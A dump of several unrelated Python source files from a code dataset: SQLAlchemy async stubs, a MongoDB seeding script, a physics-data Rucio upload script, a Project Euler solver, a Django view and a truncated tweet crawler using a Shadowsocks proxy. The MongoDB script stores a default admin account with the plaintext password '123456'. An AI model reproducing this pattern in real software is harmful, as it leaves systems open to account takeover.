_T], *arg: Any, **kw: Any\n ) -> _T: ...\n async def execute(\n self,\n statement: Executable,\n params: Optional[Mapping] = ...,\n execution_options: Mapping = ...,\n bind_arguments: Optional[Mapping] = ...,\n **kw: Any,\n ) -> Result: ...\n async def scalar(\n self,\n statement: Executable,\n params: Optional[Mapping] = ...,\n execution_options: Mapping = ...,\n bind_arguments: Optional[Mapping] = ...,\n **kw: Any,\n ) -> Any: ...\n async def get(\n self,\n entity: Any,\n ident: Any,\n options: Optional[Any] = ...,\n populate_existing: bool = ...,\n with_for_update: Optional[Any] = ...,\n identity_token: Optional[Any] = ...,\n ): ...\n async def stream(\n self,\n statement: Any,\n params: Optional[Any] = ...,\n execution_options: Any = ...,\n bind_arguments: Optional[Any] = ...,\n **kw: Any,\n ): ...\n async def merge(self, instance: Any, load: bool = ...): ...\n async def flush(self, objects: Optional[Any] = ...) -> None: ...\n async def connection(self): ...\n def begin(self, **kw: Any): ...\n def begin_nested(self, **kw: Any): ...\n async def rollback(self): ...\n async def commit(self): ...\n async def close(self): ...\n @classmethod\n async def close_all(self): ...\n async def __aenter__(self): ...\n async def __aexit__(\n self, type_: Any, value: Any, traceback: Any\n ) -> None: ...\n\nclass _AsyncSessionContextManager:\n async_session: Any = ...\n def __init__(self, async_session: Any) -> None: ...\n trans: Any = ...\n async def __aenter__(self): ...\n async def __aexit__(\n self, type_: Any, value: Any, traceback: Any\n ) -> None: ...\n\nclass AsyncSessionTransaction(StartableContext):\n session: Any = ...\n nested: Any = ...\n sync_transaction: Any = ...\n def __init__(self, session: Any, nested: bool = ...) -> None: ...\n @property\n def is_active(self): ...\n async def rollback(self) -> None: ...\n async def commit(self) -> None: ...\n async def start(self): ...\n async def __aexit__(self, type_: Any, value: Any, traceback: Any): ...\n","sub_path":"sqlalchemy-stubs/ext/asyncio/session.pyi","file_name":"session.pyi","file_ext":"pyi","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284566331","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import datetime\n\nprint('__name__ = ', __name__)\n\n\ndef _get_db(function):\n def wrapper(*args, **kwargs):\n try:\n db = args[0].db.client[args[1]]\n return function(db, *args, **kwargs)\n except Exception as e:\n raise\n return wrapper\n\n\ndef drop_mongodb(mongo, db_name):\n # Удалить БД, если она существует\n mongo.db.client.drop_database(db_name)\n\n # Выбираем БД\n db = mongo.db.client[db_name]\n # db => \n\n # Удалить коллекцию\n db.drop_collection('users')\n db.drop_collection('acompanies')\n db.drop_collection('ausers')\n db.drop_collection('rows')\n db.drop_collection('transactions')\n db.drop_collection('history')\n\n\ndef add_default_data_in_mongodb(mongo, db_name):\n # Выбираем БД\n db = mongo.db.client[db_name]\n\n # Добавление документов в колекцию 'users'\n object_id = db.users.save({\n 'username': 'admin',\n 'password': '123456',\n 'email': 'admin@strategic.com',\n 'active': 1,\n 'level': 1,\n 'confirmed': 1,\n 'date': datetime.utcnow(),\n 'last_update': datetime.utcnow(),\n })\n # More users\n # db.users.save({'name': 'user 2', 'level': 2})\n # db.users.insert({'name': 'user 3', 'level': 3})\n\n@_get_db\ndef print_all_users(*args):\n db = args[0]\n for user in db.users.find():\n print(user)\n\n\ndef init_db(app, mongo):\n \"\"\"Initializes the database.\"\"\"\n\n db_name = app.config.get('MONGO_DBNAME', app.name)\n print('db_name: ', db_name)\n\n # Очистим, удалим базу\n drop_mongodb(mongo, db_name)\n\n # Добавим дефалтные данные\n add_default_data_in_mongodb(mongo, db_name)\n\n\n # Выбираем БД\n db = mongo.db.client[db_name]\n\n # # Полное имя колекции\n # print(db.users.full_name)\n\n # # Получить все документы\n # for user in db.users.find():\n # print(user)\n\n print_all_users(mongo, db_name)\n\n build_table(mongo, db_name)\n\n # db.acompanies.insert([\n # {\"_id\": \"microsoft\", \"year\": 1974, \"date\": datetime.utcnow()},\n # {\"_id\": \"aple\", \"year\": 1975, \"date\": datetime.utcnow()},\n # ])\n # acompanies = db.acompanies.find()\n # for acompanie in acompanies:\n # print(acompanie['date'], type(acompanie['date']))\n\n return\n\n # ---------------------------\n\n # platform_id = db.platform.insert({})\n # object_id = db.rows.insert({\n # 'data': '19.02.2013',\n # 'amount': 1000,\n # 'account': 'Gk298',\n # 'subaccount': 'LG',\n # 'platform': 'Prosper',\n # })\n # result = db.objects.insert_one({\"last_modified\": datetime.datetime.utcnow()})\n db.acompanies.insert([\n {\"_id\": \"microsoft\", \"year\": 1974, \"date\": datetime.utcnow()},\n {\"_id\": \"aple\", \"year\": 1975, \"date\": datetime.utcnow()},\n ])\n db.ausers.insert({'name': \"Tom\", 'age': 28, 'company': \"microsoft\"})\n db.ausers.insert({'name': \"ura\", 'age': 30, 'company': \"aple\"})\n user = db.ausers.find_one()\n # user['company']\n comp = db.acompanies.find_one({'_id': user['company']})\n # print(comp)\n print(user)\n\n \"\"\"\n users = db.ausers.find()\n for user in users:\n print(user)\n\n acompanies = db.acompanies.find()\n for acompanie in acompanies:\n print(acompanie)\n\n parent = db.acompanies.find_one( {\"_id\": \"microsoft\" }, { \"parent\": 1, \"alias\":1, \"title\":1})\n \"\"\"\n \"\"\"\n # db.ausers.aggregate([ { $match: {$or:[{type:\"blogs\"},{type:\"user\"}]} } ])\n print('-'*100)\n cursor = db.ausers.aggregate(\n [\n {\"$group\": {\"_id\": \"microsoft\", \"count\": {\"$sum\": 1}}}\n ]\n )\n print(cursor)\n for cur in cursor:\n print(cur)\n\n users = db.ausers.find( { 'company': { '$in': [\"microsoft\", \"aple\"] } } )\n print(users)\n print( list(users) )\n \"\"\"\n\ndef build_table(mongo, db_name):\n\n doc = [\n {'date': '07.05.2012', 'amount': 3000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '07.09.2012', 'amount': 7000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '05.10.2012', 'amount': 5000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '06.11.2012', 'amount': 5000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '27.12.2012', 'amount': 20000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '05.02.2013', 'amount': 10000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '19.02.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '20.03.2013', 'amount': 2000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '09.05.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '20.05.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '28.06.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '14.08.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '03.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '12.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '16.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '27.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '02.10.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '16.10.2013', 'amount': 100, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '31.10.2013', 'amount': 400, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '09.11.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '05.03.2014', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '07.04.2014', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '20.05.2014', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '29.02.2016', 'amount': 2000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '28.04.2016', 'amount': 5000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '23.07.2013', 'amount': 100000, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Prosper'},\n {'date': '20.08.2013', 'amount': 50000, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '04.11.2013', 'amount': 100000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '27.11.2013', 'amount': 35000, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '05.12.2013', 'amount': 1500, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '05.12.2013', 'amount': 13500, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '24.01.2014', 'amount': 45000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '30.01.2014', 'amount': 20000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '12.02.2014', 'amount': 10000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '30.01.2014', 'amount': 50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '12.02.2014', 'amount': 58900, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '21.02.2014', 'amount': 80000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '28.02.2014', 'amount': 50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '08.07.2014', 'amount': 250000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '25.07.2014', 'amount': 50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '27.12.2014', 'amount': 10000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '04.01.2015', 'amount': 25000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '05.01.2015', 'amount': 40000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '06.01.2015', 'amount': 100000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '09.01.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'ED', 'platform': 'Lending Club'},\n {'date': '04.02.2015', 'amount': 30000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '11.02.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '18.02.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '27.02.2015', 'amount': 10000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '27.02.2015', 'amount': 120000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '03.03.2015', 'amount': 15000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '08.03.2015', 'amount': 10000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '28.02.2015', 'amount': 15000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '10.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '13.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '16.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '20.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '25.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '01.02.2015', 'amount': -3928, 'account': 'SS1', 'subaccount': 'SSM', 'platform': 'Prosper'},\n {'date': '01.02.2015', 'amount': -28782, 'account': 'SS1', 'subaccount': 'SSM', 'platform': 'Lending Club'},\n {'date': '02.04.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '23.04.2015', 'amount': -50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '14.01.2016', 'amount': -70000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '23.01.2016', 'amount': -25823, 'account': 'SS1', 'subaccount': 'SSM', 'platform': 'Prosper'},\n {'date': '01.07.2016', 'amount': -6000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '20.06.2014', 'amount': 100000, 'account': 'SS2', 'subaccount': 'AV', 'platform': 'Prosper'},\n {'date': '11.07.2014', 'amount': 100000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '22.02.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '27.02.2015', 'amount': 15000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '05.01.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '12.04.2015', 'amount': 5000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '15.04.2015', 'amount': 25, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '24.04.2015', 'amount': 5000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '28.04.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '29.04.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '01.05.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '05.05.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '07.05.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Prosper'},\n {'date': '12.05.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Prosper'},\n {'date': '19.05.2015', 'amount': 20000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '21.05.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '26.05.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '25.06.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'MF', 'platform': 'Lending Club'},\n {'date': '30.06.2015', 'amount': 150000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '01.07.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '02.07.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Prosper'},\n {'date': '15.07.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Prosper'},\n {'date': '22.07.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '23.07.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '23.01.2016', 'amount': -7000, 'account': 'SS2', 'subaccount': 'SSM', 'platform': 'Prosper'},\n {'date': '23.01.2016', 'amount': -3982, 'account': 'SS2', 'subaccount': 'SSM', 'platform': 'Lending Club'},\n ]\n new_doc = []\n for item in doc:\n item['date'] = datetime.strptime(item['date'], \"%d.%m.%Y\").replace(tzinfo=None)\n item['last_update'] = datetime.utcnow()\n new_doc.append(item)\n\n # Выбираем БД\n db = mongo.db.client[db_name]\n\n object_id = db.rows.insert(new_doc)\n # print(object_id)\n\n # rows = db.rows.find().sort('date', 1)\n # for item in rows:\n # # dt = item['date']\n # print(str(item['date']), item['date'].strftime(\"%m/%d/%Y\"))\n\n sdt = datetime.strptime('01.07.2016', \"%d.%m.%Y\")\n rows = db.rows.find({'date': sdt})\n print(rows)\n for item in rows:\n print(item)\n\n\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":15062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168315485","text":"#!/usr/bin/env python\n# import logging\n# logging.basicConfig(level='DEBUG')\nimport argparse\nimport os\nimport shutil\nimport numpy as np\nimport strax\nimport straxen\nimport datetime\nfrom admix.utils.naming import make_did\nfrom admix.interfaces.rucio_summoner import RucioSummoner\nimport rucio\nfrom rucio.client.client import Client\nfrom rucio.client.uploadclient import UploadClient\nfrom utilix import DB\nfrom pprint import pprint\nfrom immutabledict import immutabledict\n\ndb = DB()\n\ndef apply_global_version(context, cmt_version):\n context.set_config(dict(gain_model=('CMT_model', (\"to_pe_model\", cmt_version))))\n context.set_config(dict(s2_xy_correction_map=(\"CMT_model\", ('s2_xy_map', cmt_version), True)))\n context.set_config(dict(elife_conf=(\"elife\", cmt_version, True)))\n context.set_config(dict(mlp_model=(\"CMT_model\", (\"mlp_model\", cmt_version), True)))\n context.set_config(dict(gcn_model=(\"CMT_model\", (\"gcn_model\", cmt_version), True)))\n context.set_config(dict(cnn_model=(\"CMT_model\", (\"cnn_model\", cmt_version), True)))\n\n\ndef get_hashes(st):\n hashes = set([(d, st.key_for('0', d).lineage_hash)\n for p in st._plugin_class_registry.values()\n for d in p.provides if p.save_when == strax.SaveWhen.ALWAYS])\n return {dtype: h for dtype, h in hashes}\n\n\ndef merge(runid_str, # run number padded with 0s\n dtype, # data type 'level' e.g. records, peaklets\n st, # strax context\n path # path where the data is stored\n ):\n\n # get the storage path, since will need to reset later\n _storage_paths = [storage.path for storage in st.storage]\n\n # initialize plugin needed for processing\n plugin = st._get_plugins((dtype,), runid_str)[dtype]\n st._set_plugin_config(plugin, runid_str, tolerant=False)\n plugin.setup()\n\n for keystring in plugin.provides:\n key = strax.DataKey(runid_str, keystring, plugin.lineage)\n saver = st.storage[0].saver(key, plugin.metadata(runid_str, keystring))\n # monkey patch the saver\n tmpname = os.path.split(saver.tempdirname)[1]\n dirname = os.path.split(saver.dirname)[1]\n saver.tempdirname = os.path.join(path, tmpname)\n saver.dirname = os.path.join(path, dirname)\n saver.is_forked = True\n # merge the jsons\n saver.close()\n\n # change the storage frontend to use the merged data\n st.storage[0] = strax.DataDirectory(path)\n\n # rechunk the data if we can\n for keystring in plugin.provides:\n rechunk = True\n if isinstance(plugin.rechunk_on_save, immutabledict):\n if not plugin.rechunk_on_save[keystring]:\n rechunk = False\n else:\n if not plugin.rechunk_on_save:\n rechunk = False\n\n if rechunk:\n print(f\"Rechunking {keystring}\")\n st.copy_to_frontend(runid_str, keystring, 1, rechunk=True)\n else:\n print(f\"Not rechunking {keystring}. Just copy to the staging directory.\")\n key = st.key_for(runid_str, keystring)\n src = os.path.join(st.storage[0].path, str(key))\n dest = os.path.join(st.storage[1].path, str(key))\n shutil.copytree(src, dest)\n\n # reset in case we need to merge more data\n st.storage = [strax.DataDirectory(path) for path in _storage_paths]\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Combine strax output\")\n parser.add_argument('dataset', help='Run number', type=int)\n parser.add_argument('dtype', help='dtype to combine')\n parser.add_argument('--context', help='Strax context')\n parser.add_argument('--input', help='path where the temp directory is')\n parser.add_argument('--rse', help='RSE to upload to')\n parser.add_argument('--cmt', help='CMT global version')\n parser.add_argument('--update-db', help='flag to update runsDB', dest='update_db',\n action='store_true')\n parser.add_argument('--upload-to-rucio', help='flag to upload to rucio', dest='upload_to_rucio',\n action='store_true')\n\n args = parser.parse_args()\n\n runid = args.dataset\n runid_str = \"%06d\" % runid\n dtype = args.dtype\n path = args.input\n\n final_path = 'finished_data'\n\n # get context\n st = getattr(straxen.contexts, args.context)()\n st.storage = [strax.DataDirectory('./'),\n strax.DataDirectory(final_path) # where we are copying data to\n ]\n apply_global_version(st, args.cmt)\n\n # check what data is in the output folder\n dtypes = [d.split('-')[1] for d in os.listdir(path)]\n\n if 'records' in dtypes:\n plugin_levels = ['records', 'peaklets']\n else:\n plugin_levels = ['peaklets']\n\n # merge\n for dtype in plugin_levels:\n print(f\"Merging {dtype} level\")\n merge(runid_str, dtype, st, path)\n\n\n print(f\"Current contents of {final_path}:\")\n print(os.listdir(final_path))\n\n # now upload the merged metadata\n # setup the rucio client(s)\n if not args.upload_to_rucio:\n print(\"Ignoring rucio upload. Exiting\")\n return\n\n # need to patch the storage one last time\n st.storage = [strax.DataDirectory(final_path)]\n\n updonkey = UploadClient()\n donkey = Client()\n\n for this_dir in os.listdir(final_path):\n # prepare list of dicts to be uploaded\n _run, keystring, straxhash = this_dir.split('-')\n dataset_did = make_did(runid, keystring, straxhash)\n scope, dset_name = dataset_did.split(':')\n\n files = os.listdir(os.path.join(final_path, this_dir))\n to_upload = []\n existing_files = [f for f in donkey.list_dids(scope, {'type': 'file'}, type='file')]\n existing_files = [f for f in existing_files if dset_name in f]\n\n try:\n existing_files_in_dataset = [f['name'] for f in donkey.list_files(scope, dset_name)]\n except rucio.common.exception.DataIdentifierNotFound:\n existing_files_in_dataset = []\n\n\n # for some reason files get uploaded but not attached correctly\n need_attached = list(set(existing_files) - set(existing_files_in_dataset))\n\n if len(need_attached) > 0:\n dids_to_attach = [dict(scope=scope, name=name) for name in need_attached]\n\n donkey.attach_dids(scope, dset_name, dids_to_attach)\n\n for f in files:\n if f in existing_files:\n print(f\"Skipping {f} since it is already uploaded\")\n continue\n\n this_path = os.path.join(final_path, this_dir, f)\n d = dict(path=this_path,\n did_scope=scope,\n did_name=f,\n dataset_scope=scope,\n dataset_name=dset_name,\n rse=args.rse,\n register_after_upload=True\n )\n to_upload.append(d)\n\n # now do the upload!\n if len(to_upload) == 0:\n print(f\"No files to upload for {this_dir}\")\n continue\n\n # now do the upload!\n try:\n updonkey.upload(to_upload)\n except:\n print(f'Upload of {keystring} failed')\n raise\n print(f\"Upload of {len(files)} files in {this_dir} finished successfully\")\n for f in files:\n print(f\"{scope}:{f}\")\n\n # now check the rucio data matche what we expect\n rucio_files = [f for f in donkey.list_files(scope, dset_name)]\n\n # how many chunks?\n md = st.get_meta(runid_str, keystring)\n\n expected_chunks = len([c for c in md['chunks'] if c['n']>0])\n\n # we should have n+1 files in rucio (counting metadata)\n if len(rucio_files) != expected_chunks + 1:\n # we're missing some data, uh oh\n successful_chunks = set([int(f['name'].split('-')[-1]) for f in rucio_files])\n expected_chunks = set(np.arange(expected_chunks))\n\n missing_chunks = expected_chunks - successful_chunks\n\n missing_chunk_str = '/n'.join(missing_chunks)\n raise RuntimeError(f\"File mismatch! There are {len(rucio_files)} but the metadata thinks there \"\n f\"should be {expected_chunks} chunks + 1 metadata. \"\n f\"The missing chunks are:\\n{missing_chunk_str}\")\n\n chunk_mb = [chunk['nbytes'] / (1e6) for chunk in md['chunks']]\n data_size_mb = np.sum(chunk_mb)\n avg_data_size_mb = np.mean(chunk_mb)\n\n # let's do one last check of the rule\n rc = RucioSummoner()\n\n rses = [args.rse]\n if (keystring not in ['records', 'veto_regions', 'pulse_counts']\n and \"UC_DALI_USERDISK\" not in rses):\n rses.append('UC_DALI_USERDISK')\n\n\n for rse in rses:\n rule = rc.GetRule(dataset_did, rse)\n if rule['state'] == 'OK':\n status = 'transferred'\n elif rule['state'] == 'REPLICATING':\n status = 'transferring'\n else:\n status = 'error'\n\n if args.update_db:\n # update runDB\n new_data_dict = dict()\n new_data_dict['location'] = rse\n new_data_dict['did'] = dataset_did\n new_data_dict['status'] = status\n new_data_dict['host'] = \"rucio-catalogue\"\n new_data_dict['type'] = keystring\n new_data_dict['protocol'] = 'rucio'\n new_data_dict['creation_time'] = datetime.datetime.utcnow().isoformat()\n new_data_dict['creation_place'] = \"OSG\"\n #new_data_dict['file_count'] = file_count\n new_data_dict['meta'] = dict(#lineage=plugin.lineage_hash,\n avg_chunk_mb=avg_data_size_mb,\n file_count=len(rucio_files),\n size_mb=data_size_mb,\n strax_version=strax.__version__,\n straxen_version=straxen.__version__\n )\n\n db.update_data(runid, new_data_dict)\n\n\n print(f\"Database updated for {keystring} at {rse}\")\n else:\n print(\"Skipping database update.\")\n\n\n # if everything is good, let's close the dataset\n # this will make it so no more data can be added to this dataset\n if status == 'transferred':\n try:\n donkey.close(scope, dset_name)\n except:\n print(f\"Closing {scope}:{dset_name} failed\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"outsource/workflow/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":10700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"547027776","text":"### https://www.projecteuler.net/problem=62\n\nimport sys\nsys.path.append(r'..\\euler')\nimport common as euler\nimport time\n\ndef Problem62(n: int):\n ''' For a positive integer n, returns the smallest\n cube that has n digit permutations which are also cubes'''\n\n # Initialise some numbers\n start_time = time.time()\n digits = 1\n cubes = {}\n permutations = []\n\n if (n == 1):\n return 1\n\n i = 1\n while True:\n new_cube = i * i * i\n\n # If we hit a number with more digits than the previous, we can reset the problem\n if (len(str(new_cube)) > digits):\n cubes = {}\n permutations = []\n digits += len(str(new_cube))\n\n found_permutation = False\n # First of all, let's try to find a permutation in the existing permutation groups\n for permutation in permutations:\n if (euler.is_permutation(new_cube, permutation[0])):\n found_permutation = True\n permutation.append(new_cube)\n # If this permutation has now reached n items, we return the smallest (always the first) number\n if (len(permutation) == n):\n return permutation[0], '%.3f s' % (time.time() - start_time)\n\n # If we didn't find any permutations so far, we search for one amongst the so far unused cubes\n if (not found_permutation):\n # cubes is a dict where values are grouped by a key which is the digit sum\n # this is useful because all candidate permutations will necessary have equal digit sum\n key = euler.sum_digits(new_cube)\n if (key in cubes):\n for cube in cubes[key]:\n # If we find a permutation, we insert the new pair in the permutations list\n # We also remove the cube from the singles collection, for we don't need to check it again\n if (euler.is_permutation(new_cube, cube)):\n found_permutation = True\n permutations.append([cube, new_cube])\n cubes[key].remove(cube)\n # In the special case where n is 2, the first found permutation gives us the result\n if (n == 2):\n return cube, '%.3f s' % (time.time() - start_time)\n\n #If no permutations were found, we add this to the singles list\n if (not found_permutation):\n cubes[key].append(new_cube)\n\n else:\n cubes[key] = []\n cubes[key].append(new_cube)\n\n i = i + 1","sub_path":"Page2/problem62.py","file_name":"problem62.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160161771","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom .models import Instruction, Step, Equipment\n\ndef index(request):\n template = loader.get_template('install/index.html')\n\n instruction_list = Instruction.objects.all()\n step_list = Step.objects.all()\n equipment_list = Equipment.objects.all()\n\n extras = dict()\n extras['steps'] = Step.objects.all()\n extras['instruction_list'] = instruction_list\n extras['equipment_list'] = Equipment.objects.all()\n\n context = {\n 'instruction_list': instruction_list,\n 'step_list': step_list,\n 'equipment_list': equipment_list\n }\n return HttpResponse(template.render(context=context, request=request),\n extras)\n","sub_path":"toolsuite/install/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406890594","text":"import got\nfrom datetime import date\nfrom datetime import timedelta\nfrom time import strftime\nfrom time import sleep\nimport shadowsocks\nimport sys\nimport os\nimport logging\nimport signal\nimport pickle\nimport multiprocessing\nimport random\nfrom shadowsocks import shell, daemon, eventloop, tcprelay, udprelay, asyncdns\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))\n\n#extract tweets of a certain day\ndef crawl1DayTweet(f, currentDate, company, lang):\n\ts = strftime(\"%Y-%m-%d\", currentDate.timetuple())\n\te = strftime(\"%Y-%m-%d\", (currentDate + timedelta(1)).timetuple())\n\n\t#In got/manager/TweetCriteria.py, you can find what parameters can be set.\n\ttweetCriteria = got.manager.TweetCriteria().setQuerySearch(company).setLang(lang).setSince(s).setUntil(e).setMaxTweets(10000)\n\ttweets = got.manager.TweetManager.getTweets(tweetCriteria)\n\tif tweets == None:\n\t\treturn False\n\n\tfor t in reversed(tweets):\n\t\tf.write(t.id.encode('utf-8') + '\\t' + t.username.encode('utf-8') + '\\t' + str(t.date) + '\\t' +\n\t\t\tt.geo.encode('utf-8') + '\\t' + t.text.encode('utf-8') + '\\t' + str(t.retweets) + '\\t' + str(t.favorites)\n\t\t\t+ '\\t' + t.hashtags.encode('utf-8') + '\\t' + t.mentions.encode('utf-8') + '\\t' + t.permalink.encode('utf-8') + '\\n')\n\treturn True\n\n#Copied from the source code of Shadowsocks, to cross th GFW.\ndef deployProxy(configs, index):\n\tconfig = configs[index]\n\ttry:\n\t\tlogging.info(\"starting local at %s:%d\" % (config['local_address'], config['local_port']))\n\n\t\tdns_resolver = asyncdns.DNSResolver()\n\t\ttcp_server = tcprelay.TCPRelay(config, dns_resolver, True)\n\t\tudp_server = 